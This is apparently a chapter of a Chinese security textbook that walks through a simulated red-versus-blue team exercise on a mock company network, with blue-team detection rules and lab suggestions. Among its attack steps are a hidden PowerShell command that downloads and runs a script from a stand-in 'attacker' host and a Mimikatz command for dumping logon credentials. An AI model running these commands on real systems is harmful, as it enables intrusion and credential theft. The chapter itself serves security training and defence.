第八章：实战模拟：红蓝对抗项目全过程

本章将以一个真实场景为背景，模拟红队（攻击者）与蓝队（防御者）在企业内网中的攻防全过程。涵盖攻击路径设计、防御策略部署、日志追踪分析、应急响应等关键流程。

9.1 项目背景设定

• 企业名称：某科技公司内网环境（模拟）

• 网络结构：DMZ区、办公区、数据库区

• 操作系统：Windows Server 2019、Ubuntu 22.04

• 红队目标：获取核心数据库中的客户数据

• 蓝队目标：发现并阻断攻击行为，保留取证证据

---

9.2 红队攻击全过程

① 阶段一：信息收集（Reconnaissance）

• 目标域名解析、员工邮箱泄露信息抓取

• 工具使用：theHarvester、shodan、hunter

theHarvester -d example.com -b google

② 阶段二：初始入侵（Initial Access）

• 攻击方式：钓鱼邮件 + Word 宏远控

• 工具：Metasploit + Empire + MS Office Payload

powershell -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://attacker/cmd.ps1')"

③ 阶段三：建立据点（Persistence）

• 设置计划任务、注册表启动项

• 安装反向远控 shell（如 Sliver/Cobalt Strike）

④ 阶段四：权限提升（Privilege Escalation）

• 利用提权工具：WinPEAS、Juicy Potato

• 搜索弱口令服务、SMB 提权路径

⑤ 阶段五：横向移动（Lateral Movement）

• 使用 PsExec 工具登录其他主机

• 利用 Mimikatz 获取域凭证

Invoke-Mimikatz -Command '"sekurlsa::logonpasswords"'

⑥ 阶段六：目标达成（目标获取 + 外传）

• 目标：MySQL 客户数据备份

• 打包加密数据并通过 DNS 隧道传出

• 工具：exfil, iodine, dns2tcp

---

9.3 蓝队防守与响应全过程

① 安全基线防御部署

• EDR 系统部署（如火绒/360 EDR）

• 日志采集平台（ELK / Wazuh / Splunk）

② 日志与行为监控

• 登录异常检测（频繁失败、凌晨登录）

• 命令审计检测（调用 powershell, regsvr32）

 ③ 安全告警响应流程

步骤	操作
初步识别	EDR 发现终端异常行为
深入分析	检查攻击者 IP、进程树、关联 hash、文件行为
阻断行为	阻止反向 shell 通信、断网处理
溯源取证	抓取内存镜像、提取 IOC、关联其他主机风险

9.4 攻防双方技术对抗细节

攻击手段	蓝队检测与反制策略
PowerShell 下载执行	事件 ID 4104 + 正则规则过滤可疑命令
横向使用 PsExec	事件 ID 5140 / 4624 非常规主机 SMB 通信
DNS 隧道数据外传	DNS 请求流量监控 + 分析数据包负载是否异常
注册表持久化	Wazuh/Splunk 检测注册表变动，识别异常启动项
C2 控制信道隐匿	定时出站请求行为监测，频率与目标地址模式识别

 9.5 攻防总结与提升建议

红队视角建议

• 自动化攻击链整合（使用 Cobalt Strike 或 Sliver）

• 控制行为节奏，避开定时扫描与行为检测周期

• 使用内存马、反沙箱识别机制提高隐蔽性

蓝队视角建议

• 构建基于行为特征的检测规则库（YARA、Sysmon）

• 强化终端防护，重点防控 lateral movement 与持久化行为

• 快速联动响应机制（EDR 告警 + SIEM + SOAR）

 9.6 扩展实战场景推荐

场景名称	内容简述
内网靶场搭建	使用 Vulhub、AD Lab、Red Team Lab 模拟企业环境
自动化红队工具链	使用 Mythic, Sliver, CS, Invoke-AdversarySimulation
日志仿真与检测演练	使用 LogonTracer、Sysmon + ELK 仿真异常行为分析

本章小结

关键内容	内容说明
攻击流程	红队从信息收集到数据外传的典型 APT 攻击链
防守机制	蓝队从日志监控、EDR 响应到 IOC 分析的完整流程
实战策略建议	双方技术要点与对抗建议，强调日志审计与异常检测重要性
实训平台推荐	提供多个适用于红蓝对抗实验与 CTF 模拟的训练环境与工具链建议